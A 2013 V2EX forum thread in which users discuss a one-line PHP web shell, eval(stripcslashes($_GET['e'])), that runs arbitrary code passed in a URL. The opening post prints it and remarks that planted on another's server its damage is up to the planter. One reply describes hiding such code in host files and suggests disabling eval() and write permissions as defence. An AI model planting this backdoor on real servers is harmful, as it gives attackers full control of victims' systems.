首页   注册   登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Coding
V2EX  ›  PHP

一句话的代码竟然有这么强的攻击性。对服务器来说是致命的。

  •  
  •   liyandong · 2013-01-02 00:09:54 +08:00 · 3877 次点击
    这是一个创建于 2538 天前的主题,其中的信息可能已经有所发展或是发生改变。
    放到别人服务器,攻击性的大小就由你自己决定了。
    <?php
    eval(stripcslashes($_GET['e']));

    http://www.oschina.net/code/snippet_173183_13710

    我看了笑了~~~
    6 回复  |  直到 1970-01-01 08:00:00 +08:00
        1
    for4   2013-01-02 00:27:03 +08:00
    笑点在哪里..~?
        2
    liyandong   2013-01-02 00:39:01 +08:00 via Android   ♥ 1
    oschina评的论
    @for4
        3
    tempdban   2013-01-02 01:25:27 +08:00 via Android
    确实啊写完楼都垮了
        4
    for4   2013-01-02 01:38:04 +08:00
    @liyandong 发现我太纯洁了, 完全没发现原来这个网页还有"下半身"...
        5
    enj0y   2013-01-02 13:49:41 +08:00
    更多的做法是将一句话混淆隐藏在宿主PHP或者其它文件里,接受到事先备好的电话号指令后释放出来。防不胜防啊!想禁一句话,最好的办法是禁eval()和使用外部储存服务,然后关闭本地WEB写权限。

    至于OSC上面的,烧主板、堵厕所嘛的,全是恶搞。
        6
    enj0y   2013-01-02 13:50:43 +08:00
    @enj0y 字打错了, eval(last.post.replaceStr("电话号","好"));
    关于   ·   FAQ   ·   API   ·   我们的愿景   ·   广告投放   ·   感谢   ·   实用小工具   ·   1021 人在线   最高记录 5043   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.3 · 22ms · UTC 23:39 · PVG 07:39 · LAX 15:39 · JFK 18:39
    ♥ Do have faith in what you're doing.